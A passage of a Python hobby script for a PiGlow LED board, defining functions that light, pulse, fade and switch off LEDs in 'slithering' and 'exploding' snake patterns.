PYGLOW.led(5, 90)
sleep(sleep_speed)
PYGLOW.led(4, 100)
sleep(sleep_speed)
PYGLOW.led(3, 110)
sleep(sleep_speed)
# Turn on Snake Tail
PYGLOW.led(1, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 10
PYGLOW.led(13, 10)
sleep(sleep_speed)
PYGLOW.led(14, 20)
sleep(sleep_speed)
PYGLOW.led(15, 30)
sleep(sleep_speed)
PYGLOW.led(16, 40)
sleep(sleep_speed)
PYGLOW.led(17, 50)
sleep(sleep_speed)
PYGLOW.led(18, 60)
sleep(sleep_speed)
PYGLOW.led(12, 70)
sleep(sleep_speed)
PYGLOW.led(5, 80)
sleep(sleep_speed)
PYGLOW.led(4, 90)
sleep(sleep_speed)
PYGLOW.led(3, 100)
sleep(sleep_speed)
PYGLOW.led(2, 110)
sleep(sleep_speed)
# Fade Head, Body 1 - 10, and Tail
PYGLOW.led(13, 0)
sleep(sleep_speed)
PYGLOW.led(14, 10)
sleep(sleep_speed)
PYGLOW.led(15, 20)
sleep(sleep_speed)
PYGLOW.led(16, 30)
sleep(sleep_speed)
PYGLOW.led(17, 40)
sleep(sleep_speed)
PYGLOW.led(18, 50)
sleep(sleep_speed)
PYGLOW.led(12, 60)
sleep(sleep_speed)
PYGLOW.led(5, 70)
sleep(sleep_speed)
PYGLOW.led(4, 80)
sleep(sleep_speed)
PYGLOW.led(3, 90)
sleep(sleep_speed)
PYGLOW.led(2, 100)
sleep(sleep_speed)
PYGLOW.led(1, 110)
sleep(sleep_speed)
# Fade Body 1 - 10 and Tail
PYGLOW.led(14, 0)
sleep(sleep_speed)
PYGLOW.led(15, 10)
sleep(sleep_speed)
PYGLOW.led(16, 20)
sleep(sleep_speed)
PYGLOW.led(17, 30)
sleep(sleep_speed)
PYGLOW.led(18, 40)
sleep(sleep_speed)
PYGLOW.led(12, 50)
sleep(sleep_speed)
PYGLOW.led(5, 60)
sleep(sleep_speed)
PYGLOW.led(4, 70)
sleep(sleep_speed)
PYGLOW.led(3, 80)
sleep(sleep_speed)
PYGLOW.led(2, 90)
sleep(sleep_speed)
PYGLOW.led(1, 100)
sleep(sleep_speed)
# Fade Body 2 - 10 and Tail
PYGLOW.led(15, 0)
sleep(sleep_speed)
PYGLOW.led(16, 10)
sleep(sleep_speed)
PYGLOW.led(17, 20)
sleep(sleep_speed)
PYGLOW.led(18, 30)
sleep(sleep_speed)
PYGLOW.led(12, 40)
sleep(sleep_speed)
PYGLOW.led(5, 50)
sleep(sleep_speed)
PYGLOW.led(4, 60)
sleep(sleep_speed)
PYGLOW.led(3, 70)
sleep(sleep_speed)
PYGLOW.led(2, 80)
sleep(sleep_speed)
PYGLOW.led(1, 90)
sleep(sleep_speed)
# Fade Body 3 - 10 and Tail
PYGLOW.led(16, 0)
sleep(sleep_speed)
PYGLOW.led(17, 10)
sleep(sleep_speed)
PYGLOW.led(18, 20)
sleep(sleep_speed)
PYGLOW.led(12, 30)
sleep(sleep_speed)
PYGLOW.led(5, 40)
sleep(sleep_speed)
PYGLOW.led(4, 50)
sleep(sleep_speed)
PYGLOW.led(3, 60)
sleep(sleep_speed)
PYGLOW.led(2, 70)
sleep(sleep_speed)
PYGLOW.led(1, 80)
sleep(sleep_speed)
# Fade Body 4 - 10 and Tail
PYGLOW.led(17, 0)
sleep(sleep_speed)
PYGLOW.led(18, 10)
sleep(sleep_speed)
PYGLOW.led(12, 20)
sleep(sleep_speed)
PYGLOW.led(5, 30)
sleep(sleep_speed)
PYGLOW.led(4, 40)
sleep(sleep_speed)
PYGLOW.led(3, 50)
sleep(sleep_speed)
PYGLOW.led(2, 60)
sleep(sleep_speed)
PYGLOW.led(1, 70)
sleep(sleep_speed)
# Fade Body 5 - 10 and Tail
PYGLOW.led(18, 0)
sleep(sleep_speed)
PYGLOW.led(12, 10)
sleep(sleep_speed)
PYGLOW.led(5, 20)
sleep(sleep_speed)
PYGLOW.led(4, 30)
sleep(sleep_speed)
PYGLOW.led(3, 40)
sleep(sleep_speed)
PYGLOW.led(2, 50)
sleep(sleep_speed)
PYGLOW.led(1, 60)
sleep(sleep_speed)
# Fade Body 6 - 10 and Tail
PYGLOW.led(12, 0)
sleep(sleep_speed)
PYGLOW.led(5, 10)
sleep(sleep_speed)
PYGLOW.led(4, 20)
sleep(sleep_speed)
PYGLOW.led(3, 30)
sleep(sleep_speed)
PYGLOW.led(2, 40)
sleep(sleep_speed)
PYGLOW.led(1, 50)
sleep(sleep_speed)
# Fade Body 7 - 10 and Tail
PYGLOW.led(5, 0)
sleep(sleep_speed)
PYGLOW.led(4, 10)
sleep(sleep_speed)
PYGLOW.led(3, 20)
sleep(sleep_speed)
PYGLOW.led(2, 30)
sleep(sleep_speed)
PYGLOW.led(1, 40)
sleep(sleep_speed)
# Fade Body 8 - 10 and Tail
PYGLOW.led(4, 0)
sleep(sleep_speed)
PYGLOW.led(3, 10)
sleep(sleep_speed)
PYGLOW.led(2, 20)
sleep(sleep_speed)
PYGLOW.led(1, 30)
sleep(sleep_speed)
# Fade Body 9 - 10 and Tail
PYGLOW.led(3, 0)
sleep(sleep_speed)
PYGLOW.led(2, 10)
sleep(sleep_speed)
PYGLOW.led(1, 20)
sleep(sleep_speed)
# Fade Body 10 and Tail
PYGLOW.led(2, 0)
sleep(sleep_speed)
PYGLOW.led(1, 10)
sleep(sleep_speed)
# Fade Tail
PYGLOW.led(1, 0)
sleep(sleep_speed)
def slithering_fading_snake_32():
"""
Lights up then fades the LEDs on arms 3 and 2
"""
LOGGER.debug("SLITHERING FADING SNAKE 32")
sleep_speed = 0.01
# Turn on Snake Head
PYGLOW.led(13, 120)
sleep(sleep_speed)
# Turn on Body 1
PYGLOW.led(14, 120)
sleep(sleep_speed)
# Fade Head
PYGLOW.led(13, 110)
sleep(sleep_speed)
# Turn on Body 2
PYGLOW.led(15, 120)
sleep(sleep_speed)
# Fade Head and Body 1
PYGLOW.led(13, 100)
sleep(sleep_speed)
PYGLOW.led(14, 110)
sleep(sleep_speed)
# Turn on Body 3
PYGLOW.led(16, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 2
PYGLOW.led(13, 90)
sleep(sleep_speed)
PYGLOW.led(14, 100)
sleep(sleep_speed)
PYGLOW.led(15, 110)
sleep(sleep_speed)
# Turn on Body 4
PYGLOW.led(17, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 3
PYGLOW.led(13, 80)
sleep(sleep_speed)
PYGLOW.led(14, 90)
sleep(sleep_speed)
PYGLOW.led(15, 100)
sleep(sleep_speed)
PYGLOW.led(16, 110)
sleep(sleep_speed)
# Turn on Body 5
PYGLOW.led(6, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 4
PYGLOW.led(13, 70)
sleep(sleep_speed)
PYGLOW.led(14, 80)
sleep(sleep_speed)
PYGLOW.led(15, 90)
sleep(sleep_speed)
PYGLOW.led(16, 100)
sleep(sleep_speed)
PYGLOW.led(17, 110)
sleep(sleep_speed)
# Turn on Body 6
PYGLOW.led(12, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 5
PYGLOW.led(13, 60)
sleep(sleep_speed)
PYGLOW.led(14, 70)
sleep(sleep_speed)
PYGLOW.led(15, 80)
sleep(sleep_speed)
PYGLOW.led(16, 90)
sleep(sleep_speed)
PYGLOW.led(17, 100)
sleep(sleep_speed)
PYGLOW.led(6, 110)
sleep(sleep_speed)
# Turn on Body 7
PYGLOW.led(11, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 6
PYGLOW.led(13, 50)
sleep(sleep_speed)
PYGLOW.led(14, 60)
sleep(sleep_speed)
PYGLOW.led(15, 70)
sleep(sleep_speed)
PYGLOW.led(16, 80)
sleep(sleep_speed)
PYGLOW.led(17, 90)
sleep(sleep_speed)
PYGLOW.led(6, 100)
sleep(sleep_speed)
PYGLOW.led(12, 110)
sleep(sleep_speed)
# Turn on Body 8
PYGLOW.led(10, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 7
PYGLOW.led(13, 40)
sleep(sleep_speed)
PYGLOW.led(14, 50)
sleep(sleep_speed)
PYGLOW.led(15, 60)
sleep(sleep_speed)
PYGLOW.led(16, 70)
sleep(sleep_speed)
PYGLOW.led(17, 80)
sleep(sleep_speed)
PYGLOW.led(6, 90)
sleep(sleep_speed)
PYGLOW.led(12, 100)
sleep(sleep_speed)
PYGLOW.led(11, 110)
sleep(sleep_speed)
# Turn on Body 9
PYGLOW.led(9, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 8
PYGLOW.led(13, 30)
sleep(sleep_speed)
PYGLOW.led(14, 40)
sleep(sleep_speed)
PYGLOW.led(15, 50)
sleep(sleep_speed)
PYGLOW.led(16, 60)
sleep(sleep_speed)
PYGLOW.led(17, 70)
sleep(sleep_speed)
PYGLOW.led(6, 80)
sleep(sleep_speed)
PYGLOW.led(12, 90)
sleep(sleep_speed)
PYGLOW.led(11, 100)
sleep(sleep_speed)
PYGLOW.led(10, 110)
sleep(sleep_speed)
# Turn on Body 10
PYGLOW.led(8, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 9
PYGLOW.led(13, 20)
sleep(sleep_speed)
PYGLOW.led(14, 30)
sleep(sleep_speed)
PYGLOW.led(15, 40)
sleep(sleep_speed)
PYGLOW.led(16, 50)
sleep(sleep_speed)
PYGLOW.led(17, 60)
sleep(sleep_speed)
PYGLOW.led(6, 70)
sleep(sleep_speed)
PYGLOW.led(12, 80)
sleep(sleep_speed)
PYGLOW.led(11, 90)
sleep(sleep_speed)
PYGLOW.led(10, 100)
sleep(sleep_speed)
PYGLOW.led(9, 110)
sleep(sleep_speed)
# Turn on Tail
PYGLOW.led(7, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 10
PYGLOW.led(13, 10)
sleep(sleep_speed)
PYGLOW.led(14, 20)
sleep(sleep_speed)
PYGLOW.led(15, 30)
sleep(sleep_speed)
PYGLOW.led(16, 40)
sleep(sleep_speed)
PYGLOW.led(17, 50)
sleep(sleep_speed)
PYGLOW.led(6, 60)
sleep(sleep_speed)
PYGLOW.led(12, 70)
sleep(sleep_speed)
PYGLOW.led(11, 80)
sleep(sleep_speed)
PYGLOW.led(10, 90)
sleep(sleep_speed)
PYGLOW.led(9, 100)
sleep(sleep_speed)
PYGLOW.led(8, 110)
sleep(sleep_speed)
# Fade Head, Body 1 - 10, and Tail
PYGLOW.led(13, 0)
sleep(sleep_speed)
PYGLOW.led(14, 10)
sleep(sleep_speed)
PYGLOW.led(15, 20)
sleep(sleep_speed)
PYGLOW.led(16, 30)
sleep(sleep_speed)
PYGLOW.led(17, 40)
sleep(sleep_speed)
PYGLOW.led(6, 50)
sleep(sleep_speed)
PYGLOW.led(12, 60)
sleep(sleep_speed)
PYGLOW.led(11, 70)
sleep(sleep_speed)
PYGLOW.led(10, 80)
sleep(sleep_speed)
PYGLOW.led(9, 90)
sleep(sleep_speed)
PYGLOW.led(8, 100)
sleep(sleep_speed)
PYGLOW.led(7, 110)
sleep(sleep_speed)
# Fade Body 1 - 10 and Tail
PYGLOW.led(14, 0)
sleep(sleep_speed)
PYGLOW.led(15, 10)
sleep(sleep_speed)
PYGLOW.led(16, 20)
sleep(sleep_speed)
PYGLOW.led(17, 30)
sleep(sleep_speed)
PYGLOW.led(6, 40)
sleep(sleep_speed)
PYGLOW.led(12, 50)
sleep(sleep_speed)
PYGLOW.led(11, 60)
sleep(sleep_speed)
PYGLOW.led(10, 70)
sleep(sleep_speed)
PYGLOW.led(9, 80)
sleep(sleep_speed)
PYGLOW.led(8, 90)
sleep(sleep_speed)
PYGLOW.led(7, 100)
sleep(sleep_speed)
# Fade Body 2 - 10 and Tail
PYGLOW.led(15, 0)
sleep(sleep_speed)
PYGLOW.led(16, 10)
sleep(sleep_speed)
PYGLOW.led(17, 20)
sleep(sleep_speed)
PYGLOW.led(6, 30)
sleep(sleep_speed)
PYGLOW.led(12, 40)
sleep(sleep_speed)
PYGLOW.led(11, 50)
sleep(sleep_speed)
PYGLOW.led(10, 60)
sleep(sleep_speed)
PYGLOW.led(9, 70)
sleep(sleep_speed)
PYGLOW.led(8, 80)
sleep(sleep_speed)
PYGLOW.led(7, 90)
sleep(sleep_speed)
# Fade Body 3 - 10 and Tail)
PYGLOW.led(16, 0)
sleep(sleep_speed)
PYGLOW.led(17, 10)
sleep(sleep_speed)
PYGLOW.led(6, 20)
sleep(sleep_speed)
PYGLOW.led(12, 30)
sleep(sleep_speed)
PYGLOW.led(11, 40)
sleep(sleep_speed)
PYGLOW.led(10, 50)
sleep(sleep_speed)
PYGLOW.led(9, 60)
sleep(sleep_speed)
PYGLOW.led(8, 70)
sleep(sleep_speed)
PYGLOW.led(7, 80)
sleep(sleep_speed)
# Fade Body 4 - 10 and Tail)
PYGLOW.led(17, 0)
sleep(sleep_speed)
PYGLOW.led(6, 10)
sleep(sleep_speed)
PYGLOW.led(12, 20)
sleep(sleep_speed)
PYGLOW.led(11, 30)
sleep(sleep_speed)
PYGLOW.led(10, 40)
sleep(sleep_speed)
PYGLOW.led(9, 50)
sleep(sleep_speed)
PYGLOW.led(8, 60)
sleep(sleep_speed)
PYGLOW.led(7, 70)
sleep(sleep_speed)
# Fade Body 5 - 10 and Tail)
PYGLOW.led(6, 0)
sleep(sleep_speed)
PYGLOW.led(12, 10)
sleep(sleep_speed)
PYGLOW.led(11, 20)
sleep(sleep_speed)
PYGLOW.led(10, 30)
sleep(sleep_speed)
PYGLOW.led(9, 40)
sleep(sleep_speed)
PYGLOW.led(8, 50)
sleep(sleep_speed)
PYGLOW.led(7, 60)
sleep(sleep_speed)
# Fade Body 6 - 10 and Tail
PYGLOW.led(12, 0)
sleep(sleep_speed)
PYGLOW.led(11, 10)
sleep(sleep_speed)
PYGLOW.led(10, 20)
sleep(sleep_speed)
PYGLOW.led(9, 30)
sleep(sleep_speed)
PYGLOW.led(8, 40)
sleep(sleep_speed)
PYGLOW.led(7, 50)
sleep(sleep_speed)
# Fade Body 7 - 10 and Tail
PYGLOW.led(11, 0)
sleep(sleep_speed)
PYGLOW.led(10, 10)
sleep(sleep_speed)
PYGLOW.led(9, 20)
sleep(sleep_speed)
PYGLOW.led(8, 30)
sleep(sleep_speed)
PYGLOW.led(7, 40)
sleep(sleep_speed)
# Fade Body 8 - 10 and Tail
PYGLOW.led(10, 0)
sleep(sleep_speed)
PYGLOW.led(9, 10)
sleep(sleep_speed)
PYGLOW.led(8, 20)
sleep(sleep_speed)
PYGLOW.led(7, 30)
sleep(sleep_speed)
# Fade Body 9 - 10 and Tail
PYGLOW.led(9, 0)
sleep(sleep_speed)
PYGLOW.led(8, 10)
sleep(sleep_speed)
PYGLOW.led(7, 20)
sleep(sleep_speed)
# Fade Body 10 and Tail
PYGLOW.led(8, 0)
sleep(sleep_speed)
PYGLOW.led(7, 10)
sleep(sleep_speed)
# Fade Tail
PYGLOW.led(7, 0)
sleep(sleep_speed)
def pulsing_snake_12():
"""
Lights up and pulses the LEDs on arms 1 and 2
"""
LOGGER.debug("PULSING SNAKE 12")
# Start pulse speed at 125, end at 100, decrease by 1
for i in range(125, 99, -1):
LOGGER.debug("Pulse speed is: %s", i)
PYGLOW.set_leds(SNAKE_12_LEDS, 100, speed=i, pulse=True)
sleep(0)
PYGLOW.update_leds()
PYGLOW.set_leds(SNAKE_12_LEDS, 0)
PYGLOW.update_leds()
sleep(1)
def pulsing_snake_13():
"""
Lights up and pulses the LEDs on arms 1 and 3
"""
LOGGER.debug("PULSING SNAKE 13")
# Start pulse speed at 125, end at 100, decrease by 1
for i in range(125, 99, -1):
LOGGER.debug("Pulse speed is: %s", i)
PYGLOW.set_leds(SNAKE_13_LEDS, 100, speed=i, pulse=True)
sleep(0)
PYGLOW.update_leds()
PYGLOW.set_leds(SNAKE_13_LEDS, 0)
PYGLOW.update_leds()
sleep(1)
def pulsing_snake_23():
"""
Lights up and pulses the LEDs on arms 2 and 3
"""
LOGGER.debug("PULSING SNAKE 23")
# Start pulse speed at 125, end at 100, decrease by 1
for i in range(125, 99, -1):
LOGGER.debug("Pulse speed is: %s", i)
PYGLOW.set_leds(SNAKE_23_LEDS, 100, speed=i, pulse=True)
sleep(0)
PYGLOW.update_leds()
PYGLOW.set_leds(SNAKE_23_LEDS, 0)
PYGLOW.update_leds()
sleep(1)
def exploding_snake_12():
"""
Turns off the LEDs on arms 1 and 2
"""
LOGGER.debug("Exploding Snake 12...")
explode_speed = 0.020
# Pulse
pulse_snake_12_or_21()
# Explode Snake 12
PYGLOW.led(6, 0)
sleep(explode_speed)
PYGLOW.led(18, 0)
sleep(explode_speed)
PYGLOW.led(11, 0)
sleep(explode_speed)
PYGLOW.led(5, 0)
sleep(explode_speed)
PYGLOW.led(10, 0)
sleep(explode_speed)
PYGLOW.led(4, 0)
sleep(explode_speed)
PYGLOW.led(9, 0)
sleep(explode_speed)
PYGLOW.led(3, 0)
sleep(explode_speed)
PYGLOW.led(8, 0)
sleep(explode_speed)
PYGLOW.led(2, 0)
sleep(explode_speed)
PYGLOW.led(7, 0)
sleep(explode_speed)
PYGLOW.led(1, 0)
sleep(explode_speed)
def exploding_snake_13():
"""
Turns off the LEDs on arms 1 and 3
"""
LOGGER.debug("Exploding Snake 13...")
explode_speed = 0.020
# Pulse
pulse_snake_13_or_31()
# Explode Snake 13
PYGLOW.led(18, 0)
sleep(explode_speed)
PYGLOW.led(12, 0)
sleep(explode_speed)
PYGLOW.led(17, 0)
sleep(explode_speed)
PYGLOW.led(5, 0)
sleep(explode_speed)
PYGLOW.led(16, 0)
sleep(explode_speed)
PYGLOW.led(4, 0)
sleep(explode_speed)
PYGLOW.led(15, 0)
sleep(explode_speed)
PYGLOW.led(3, 0)
sleep(explode_speed)
PYGLOW.led(14, 0)
sleep(explode_speed)
PYGLOW.led(2, 0)
sleep(explode_speed)
PYGLOW.led(13, 0)
sleep(explode_speed)
PYGLOW.led(1, 0)
sleep(explode_speed)
def exploding_snake_23():
"""
Turns off the LEDs on arms 2 and 3
"""
LOGGER.debug("Exploding Snake 23...")
explode_speed = 0.020
# Pulse
pulse_snake_23_or_32()
# Explode Snake 13
PYGLOW.led(6, 0)
sleep(explode_speed)
PYGLOW.led(12, 0)
sleep(explode_speed)
PYGLOW.led(11, 0)
sleep(explode_speed)
PYGLOW.led(17, 0)
sleep(explode_speed)
PYGLOW.led(10, 0)
sleep(explode_speed)
PYGLOW.led(16, 0)
sleep(explode_speed)
PYGLOW.led(9, 0)
sleep(explode_speed)
PYGLOW.led(15, 0)
sleep(explode_speed)
PYGLOW.led(8, 0)
sleep(explode_speed)
PYGLOW.led(14, 0)
sleep(explode_speed)
PYGLOW.led(7, 0)
sleep(explode_speed)
PYGLOW.led(13, 0)
sleep(explode_speed)
def slithering_exploding_snake_12():
"""
Lights up the LEDs on arms 1 and 2
"""
LOGGER.debug("Snake 12 is slithering...")
sleep_speed = 0.10
# Light up Snake 12
PYGLOW.led(1, 100)
sleep(sleep_speed)
PYGLOW.led(2, 100)
sleep(sleep_speed)
PYGLOW.led(3, 100)
sleep(sleep_speed)
PYGLOW.led(4, 100)
sleep(sleep_speed)
PYGLOW.led(5, 100)
sleep(sleep_speed)
PYGLOW.led(6, 100)
sleep(sleep_speed)
PYGLOW.led(18, 100)
sleep(sleep_speed)
PYGLOW.led(11, 100)
sleep(sleep_speed)
PYGLOW.led(10, 100)
sleep(sleep_speed)
PYGLOW.led(9, 100)
sleep(sleep_speed)
PYGLOW.led(8, 100)
sleep(sleep_speed)
PYGLOW.led(7, 100)
sleep(sleep_speed)
# Pulse
pulse_snake_12_or_21()
# Explode Snake 12
LOGGER.debug("Snake 12 is exploding...")
explode_snake_12_or_21()
def slithering_exploding_snake_13():
"""
Lights up the LEDs on arms 1 and 3
"""
LOGGER.debug("Snake 13 is slithering...")
sleep_speed = 0.10
# Light up Snake 13
PYGLOW.led(1, 100)
sleep(sleep_speed)
PYGLOW.led(2, 100)
sleep(sleep_speed)
PYGLOW.led(3, 100)
sleep(sleep_speed)
PYGLOW.led(4, 100)
sleep(sleep_speed)
PYGLOW.led(5, 100)
sleep(sleep_speed)
PYGLOW.led(12, 100)
sleep(sleep_speed)
PYGLOW.led(18, 100)
sleep(sleep_speed)
PYGLOW.led(17, 100)
sleep(sleep_speed)
PYGLOW.led(16, 100)
sleep(sleep_speed)
PYGLOW.led(15, 100)
sleep(sleep_speed)
PYGLOW.led(14, 100)
sleep(sleep_speed)
PYGLOW.led(13, 100)
sleep(sleep_speed)
# Pulse
pulse_snake_13_or_31()
# Explode Snake 13
LOGGER.debug("Snake 13 is exploding...")
explode_snake_13_or_31()
def slithering_exploding_snake_21():
"""
Lights up the LEDs on arms 2 and 1
"""
LOGGER.debug("Snake 21 is slithering...")
sleep_speed = 0.10
# Light up Snake 21
PYGLOW.led(7, 100)
sleep(sleep_speed)
PYGLOW.led(8, 100)
sleep(sleep_speed)
PYGLOW.led(9, 100)
sleep(sleep_speed)
PYGLOW.led(10, 100)
sleep(sleep_speed)
PYGLOW.led(11, 100)
sleep(sleep_speed)
PYGLOW.led(18, 100)
sleep(sleep_speed)
PYGLOW.led(6, 100)
sleep(sleep_speed)
PYGLOW.led(5, 100)
sleep(sleep_speed)
PYGLOW.led(4, 100)
sleep(sleep_speed)
PYGLOW.led(3, 100)
sleep(sleep_speed)
PYGLOW.led(2, 100)
sleep(sleep_speed)
PYGLOW.led(1, 100)
sleep(sleep_speed)
# Pulse
pulse_snake_12_or_21()
# Explode Snake 21
LOGGER.debug("Snake 21 is exploding...")
explode_snake_12_or_21()
def slithering_exploding_snake_23():
"""
Lights up the LEDs on arms 2 and 3
"""
LOGGER.debug("Snake 23 is slithering...")
sleep_speed = 0.10
# Light up Snake 23
PYGLOW.led(7, 100)
sleep(sleep_speed)
PYGLOW.led(8, 100)
sleep(sleep_speed)
PYGLOW.led(9, 100)
sleep(sleep_speed)
PYGLOW.led(10, 100)
sleep(sleep_speed)
PYGLOW.led(11, 100)
sleep(sleep_speed)
PYGLOW.led(12, 100)
sleep(sleep_speed)
PYGLOW.led(6, 100)
sleep(sleep_speed)
PYGLOW.led(17, 100)
sleep(sleep_speed)
PYGLOW.led(16, 100)
sleep(sleep_speed)
PYGLOW.led(15, 100)
sleep(sleep_speed)
PYGLOW.led(14, 100)
sleep(sleep_speed)
PYGLOW.led(13, 100)
sleep(sleep_speed)
# Pulse
pulse_snake_23_or_32()
# Explode Snake 23
LOGGER.debug("Snake 23 is exploding...")
explode_snake_23_or_32()
def slithering_exploding_snake_31():
"""
Lights up the LEDs on arms 3 and 1
"""
LOGGER.debug("Snake 31 is slithering...")
sleep_speed = 0.10
# Light up Snake 31
PYGLOW.led(13, 100)
sleep(sleep_speed)
PYGLOW.led(14, 100)
sleep(sleep_speed)
PYGLOW.led(15, 100)
sleep(sleep_speed)
PYGLOW.led(16, 100)
sleep(sleep_speed)
PYGLOW.led(17, 100)
sleep(sleep_speed)
PYGLOW.led(18, 100)
sleep(sleep_speed)
PYGLOW.led(12, 100)
sleep(sleep_speed)
PYGLOW.led(5, 100)
sleep(sleep_speed)
PYGLOW.led(4, 100)
sleep(sleep_speed)
PYGLOW.led(3, 100)
sleep(sleep_speed)
PYGLOW.led(2, 100)
sleep(sleep_speed)
PYGLOW.led(1, 100)
sleep(sleep_speed)
# Pulse
pulse_snake_13_or_31()
# Explode Snake 31
LOGGER.debug("Snake 31 is exploding...")
explode_snake_13_or_31()
def slithering_exploding_snake_32():
"""
Lights up the LEDs on arms 3 and 2
"""
LOGGER.debug("Snake 32 is slithering...")
sleep_speed = 0.10
# Light up Snake 32
PYGLOW.led(13, 100)
sleep(sleep_speed)
PYGLOW.led(14, 100)
sleep(sleep_speed)
PYGLOW.led(15, 100)
sleep(sleep_speed)
PYGLOW.led(16, 100)
sleep(sleep_speed)
PYGLOW.led(17, 100)
sleep(sleep_speed)
PYGLOW.led(6, 100)
sleep(sleep_speed)
PYGLOW.led(12, 100)
sleep(sleep_speed)
PYGLOW.led(11, 100)
sleep(sleep_speed)
PYGLOW.led(10, 100)
sleep(sleep_speed)
PYGLOW.led(9, 100)
sleep(sleep_speed)
PYGLOW.led(8, 100)
sleep(sleep_speed)
PYGLOW.led(7, 100)
sleep(sleep_speed)
# Pulse
pulse_snake_23_or_32()
# Explode Snake 32
LOGGER.debug("Snake 32 is slithering...")
explode_snake_23_or_32()
def pulse_snake_12_or_21():
"""
Lights up and pulses the LEDs on arms 1 and 2
"""
LOGGER.debug("Snake is pulsing.")
# Start pulse speed at 175, end at 225, increase by 1
for i in range(175, 226, 1):
LOGGER.debug("Pulse speed is: %s", i)
PYGLOW.led(SNAKE_12_LEDS, 100, speed=i, pulse=True)
sleep(0)
PYGLOW.led(SNAKE_12_LEDS, 100)
sleep(1)
def pulse_snake_13_or_31():
"""
Lights up and pulses the LEDs on arms 1 and 3
"""
LOGGER.debug("Snake is pulsing.")
# Start pulse speed at 175, end at 225, increase by 1
for i in range(175, 226, 1):
LOGGER.debug("Pulse speed is: %s", i)
PYGLOW.led(SNAKE_13_LEDS, 100, speed=i, pulse=True)
sleep(0)
PYGLOW.led(SNAKE_13_LEDS, 100)
sleep(1)
def pulse_snake_23_or_32():
"""
Lights up and pulses the LEDs on arms 2 and 3
"""
LOGGER.debug("Snake is pulsing.")
# Start pulse speed at 175, end at 225, increase by 1
for i in range(175, 226, 1):
LOGGER.debug("Pulse speed is: %s", i)
PYGLOW.led(SNAKE_23_LEDS, 100, speed=i, pulse=True)
sleep(0)
PYGLOW.led(SNAKE_23_LEDS, 100)
sleep(1)
def explode_snake_12_or_21():
"""
Lights up and turns off the LEDs on arms 1 and 2
"""
explode_speed = 0.015
# Explode snake 12 or 21
PYGLOW.led(18, 0)
sleep(explode_speed)
PYGLOW.led(6, 0)
sleep(explode_speed)
PYGLOW.led(11, 0)
sleep(explode_speed)
PYGLOW.led(5, 0)
sleep(explode_speed)
PYGLOW.led(10, 0)
sleep(explode_speed)
PYGLOW.led(4, 0)
sleep(explode_speed)
PYGLOW.led(9, 0)
sleep(explode_speed)
PYGLOW.led(3, 0)
sleep(explode_speed)
PYGLOW.led(8, 0)
sleep(explode_speed)
PYGLOW.led(2, 0)
sleep(explode_speed)
PYGLOW.led(7, 0)
sleep(explode_speed)
PYGLOW.led(1, 0)
def explode_snake_13_or_31():
"""
Lights up and turns off the LEDs on arms 1 and 3
"""
explode_speed = 0.020
# Explode snake 13 or 31
PYGLOW.led(18, 0)
sleep(explode_speed)
PYGLOW.led(12, 0)
sleep(explode_speed)
PYGLOW.led(17, 0)
sleep(explode_speed)
PYGLOW.led(5, 0)
sleep(explode_speed)
PYGLOW.led(16, 0)
sleep(explode_speed)
PYGLOW.led(4, 0)
sleep(explode_speed)
PYGLOW.led(15, 0)
sleep(explode_speed)
PYGLOW.led(3, 0)
sleep(explode_speed)
PYGLOW.led(14, 0)
sleep(explode_speed)
PYGLOW.led(2, 0)
sleep(explode_speed)
PYGLOW.led(13, 0)
sleep(explode_speed)
PYGLOW.led(1, 0)
def explode_snake_23_or_32():
"""
Lights up and turns off the LEDs on arms 2 and 3
"""
explode_speed = 0.020
# Explode snake 23 or 32
PYGLOW.led(12, 0)
sleep(explode_speed)
PYGLOW.led(6, 0)
sleep(explode_speed)
PYGLOW.led(17, 0)
sleep(explode_speed)
PYGLOW.led(11, 0)
sleep(explode_speed)
PYGLOW.led(16, 0)
sleep(explode_speed)
PYGLOW.led(10, 0)
sleep(explode_speed)
PYGLOW.led(15, 0)
sleep(explode_speed)
PYGLOW.led(9, 0)
sleep(explode_speed)
PYGLOW.led(14, 0)
sleep(explode_speed)
PYGLOW.led(8, 0)
sleep(explode_speed)
PYGLOW.led(13, 0)
sleep(explode_speed)
PYGLOW.led(7, 0)
def slithering_fizzling_fading_snake_12():
"""
Lights up the LEDs on arms 1 and 2
"""
LOGGER.debug("Snake 12 is slithering...")
sleep_speed = 0.10
# Light up Snake 12
PYGLOW.led(1, 100)
sleep(sleep_speed)
PYGLOW.led(2, 100)
sleep(sleep_speed)
PYGLOW.led(3, 100)
sleep(sleep_speed)
PYGLOW.led(4, 100)
sleep(sleep_speed)
PYGLOW.led(5, 100)
sleep(sleep_speed)
PYGLOW.led(6, 100)
sleep(sleep_speed)
PYGLOW.led(18, 100)
sleep(sleep_speed)
PYGLOW.led(11, 100)
sleep(sleep_speed)
PYGLOW.led(10, 100)
sleep(sleep_speed)
PYGLOW.led(9, 100)
sleep(sleep_speed)
PYGLOW.led(8, 100)
sleep(sleep_speed)
PYGLOW.led(7, 100)
sleep(sleep_speed)
# Pulse
pulse_snake_12_or_21()
# Explode Snake 12
LOGGER.debug("Snake 12 is exploding...")
fizzling_snake_12_or_21()
def slithering_fizzling_fading_snake_13():
"""
Lights up the LEDs on arms 1 and 3
"""
LOGGER.debug("Snake 13 is slithering...")
sleep_speed = 0.10
# Light up Snake 13
PYGLOW.led(1, 100)
sleep(sleep_speed)
PYGLOW.led(2, 100)
sleep(sleep_speed)
PYGLOW.led(3, 100)
sleep(sleep_speed)
PYGLOW.led(4, 100)
sleep(sleep_speed)
PYGLOW.led(5, 100)
sleep(sleep_speed)
PYGLOW.led(12, 100)
sleep(sleep_speed)
PYGLOW.led(18, 100)
sleep(sleep_speed)
PYGLOW.led(17, 100)
sleep(sleep_speed)
PYGLOW.led(16, 100)
sleep(sleep_speed)
PYGLOW.led(15, 100)
sleep(sleep_speed)
PYGLOW.led(14, 100)
sleep(sleep_speed)
PYGLOW.led(13, 100)
sleep(sleep_speed)
# Pulse
pulse_snake_13_or_31()
# Explode Snake 13
LOGGER.debug("Snake 13 is exploding...")
fizzling_snake_13_or_31()
def slithering_fizzling_fading_snake_21():
"""
